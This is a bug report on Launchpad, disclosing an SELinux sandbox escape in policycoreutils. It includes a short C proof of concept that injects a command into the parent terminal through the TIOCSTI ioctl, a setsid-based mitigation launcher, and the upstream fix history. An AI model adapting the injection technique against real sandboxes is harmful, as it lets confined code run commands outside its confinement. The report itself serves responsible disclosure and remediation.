SELinux sandbox escape via TIOCSTI ioctl

Bug #1626706 reported by Federico Bento
Affects                     Status         Importance   Assigned to   Milestone
policycoreutils (Debian)    Fix Released   Unknown
policycoreutils (Ubuntu)    Fix Released   Undecided    Unassigned

Bug Description

Hi,

When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
    /* Push "id\n" one byte at a time into the input queue of the
     * terminal inherited on fd 0 (the parent shell's tty). */
    char *cmd = "id\n";
    while (*cmd)
        ioctl(0, TIOCSTI, cmd++);
    /* Then run an ordinary command inside the sandbox for comparison. */
    execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
$ id <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

This is similar to CVE-2016-2568, CVE-2016-2779, etc.

Thanks,
Federico Bento.
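
As an added illustration (not code from this report or from the policycoreutils fix), a launcher that applies the standard mitigation for this class of escape: the confined command is started in a new session with setsid(), so the inherited terminal is no longer its controlling tty and the kernel refuses TIOCSTI on it (TIOCSTI is honoured only on the caller's own controlling tty unless the caller has CAP_SYS_ADMIN). The sh probe in child_has_ctty() is a constructed check, not part of any real tool.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run argv[] in a new session and return its exit status (-1 on error).
 * After setsid() the child has no controlling terminal even though
 * fds 0-2 may still refer to the launcher's tty, so TIOCSTI on them is
 * refused by the kernel (it honours TIOCSTI only on the caller's own
 * controlling tty, unless the caller holds CAP_SYS_ADMIN). */
int run_detached(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() < 0)      /* cannot fail in a freshly forked child */
            _exit(126);
        execvp(argv[0], argv);
        _exit(127);            /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed probe: a shell that tries to open its controlling tty.
 * Opening /dev/tty fails with ENXIO (non-zero exit status) when the
 * shell was started through run_detached(). Returns 1 if a ctty exists. */
int child_has_ctty(void)
{
    char *const probe[] = {"sh", "-c", ": </dev/tty", NULL};
    return run_detached(probe) == 0;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    return run_detached(argv + 1);
}
```

Detaching this way also removes job control for the confined command (Ctrl-C at the parent terminal no longer reaches it); allocating a fresh pty for the child, or filtering TIOCSTI with seccomp, are the alternatives when that matters.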

Seth Arnold (seth-arnold) wrote :

Hello Federico, thanks for the report; is this issue known upstream yet? If not, can you please report it to them? Once known, can you please add a link to their bug report here?

policycoreutils is in universe, which means it is community-supported. Would you be in a position to prepare and test fixes once fixes are available from upstream?

Thanks

Federico Bento (up201407890) wrote : Re: [Bug 1626706] Re: SELinux sandbox escape via TIOCSTI ioctl

Citando "Seth Arnold" <email address hidden>:

> Hello Federico, thanks for the report; is this issue known upstream yet?
> If not, can you please report it to them? Once known, can you please add
> a link to their bug report here?

Reported the issue just now to upstream.

> policycoreutils is in universe, which means it is community-supported.
> Would you be in a position to prepare and test fixes once fixes are
> available from upstream?
>
> Thanks

Yes, I'll be glad to. Also, the 'runcon' utility is vulnerable.

Federico Bento (up201407890) wrote :

Upstream fix:
https://marc.info/?l=selinux&m=147465160112766&w=2
https://marc.info/?l=selinux&m=147466045909969&w=2
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Seth Arnold (seth-arnold) wrote :

Very nice; can you prepare and test updated packages? Some information on the process is at https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

Thanks

information type: Private Security → Public Security
Changed in policycoreutils (Ubuntu):
status: New → Confirmed
Laurent Bigonville (bigon) wrote :

This has been fixed in 2.5-3, I guess you want to sync from Debian.

Changed in policycoreutils (Debian):
status: Unknown → Fix Released
Changed in policycoreutils (Ubuntu):
status: Confirmed → Fix Released